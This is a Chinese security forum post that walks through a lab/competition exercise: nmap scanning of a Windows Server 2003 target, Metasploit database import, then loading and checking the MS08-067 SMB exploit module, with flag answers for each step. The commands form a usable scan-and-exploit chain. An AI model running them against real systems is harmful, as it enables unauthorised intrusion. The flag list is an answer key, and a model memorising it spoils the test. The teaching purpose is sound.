安全矩阵

 找回密码
 立即注册
搜索
查看: 2152|回复: 0

漏洞扫描与利用

[复制链接]

180

主题

231

帖子

1180

积分

金牌会员

Rank: 6Rank: 6

积分
1180
发表于 2022-1-7 00:47:40 | 显示全部楼层 |阅读模式

第一步,打开网络拓扑,点击启动选项,启动实验虚拟机
第二步,使用ifconfig或ipconfig命令获取地址
确认渗透机ip地址172.16.1.7
确认靶机ip地址172.16.1.6

1.通过本地PC中渗透测试平台Kali对服务器场景server2003以半开放式不进行ping的扫描方式并配合a,要求扫描信息输出格式为xml文件格式,从生成扫描结果获取局域网(例如172.16.101.0/24)中存活靶机,以xml格式向指定文件输出信息(使用工具NMAP,使用必须要使用的参数),并将以xml格式向指定文件输出信息必须要使用的参数作为FLAG提交;
进入kali命令控制台中使用命令
nmap –n –Pn –sS –A –oX target 172.16.1.0/24扫描局域网中存活的靶机,并导出为xml格式,由于扫描的速度很慢,我们这里这针对靶机一个ip进行扫描
Flag:oX
2.根据第一题扫描的回显信息分析靶机操作系统版本信息,将操作系统版本信息作为FLAG提交;
根据上面回显的结果
Flag:MicrosoftWindows XP|2003
3.根据第一题扫描的回显信息分析靶机服务开放端口,分析开放的服务,并将共享服务的开放状态作为FLAG提交;
通过回显结果没有发现445端口对应的服务状态,我们再次使用命令nmap -sV -T4 -n -p445 172.16.1.6对445端口的服务进行扫描
发现该服务的状态为closed
Flag:closed
4.在本地PC的渗透测试平台Kali中,使用命令初始化msf数据库,并将使用的命令作为FLAG提交;
使用命令msfdb init 初始化msf数据库
Flag:msfdb init
5.在本地PC的渗透测试平台Kali中,打开msf,使用db_import将扫描结果导入到数据库中,并查看导入的数据,将查看导入的数据要使用的命令作为FLAG提交;
首先使用命令msfconsole打开渗透测试平台
然后使用命令db_import /root/target,导入之前扫描后导入到xml文件的的结果
再使用命令services查看所导入的数据
最后使用命令hosts查看主机的数据
Flag:hosts
6.在msfconsole使用search命令搜索MS08067漏洞攻击程序,并将回显结果中的漏洞时间作为FLAG提交;
使用命令searchms08_067来搜索ms08_067漏洞利用模块
Flag:2008-10-28
7.在msfconsole中利用MS08067漏洞攻击模块,将调用此模块的命令作为FLAG提交;
使用命令use exploit/windows/smb/ms08_067来调用漏洞利用模块
Flag:use exploit/windows/smb/ms08_067
8.在上一步的基础上查看需要设置的选项,并将回显中需设置的选项名作为FLAG提交;
使用命令show options查看需要配置的参数
Flag:RHOST
9.使用set命令设置目标IP(在第8步的基础上),并检测漏洞是否存在,将回显结果中第一个单词作为FLAG提交;
使用命令set RHOST172.16.1.6设置远程靶机地址,并使用命令check检测漏洞是否存在
Flag:Cannot

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-23 15:07 , Processed in 0.014185 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表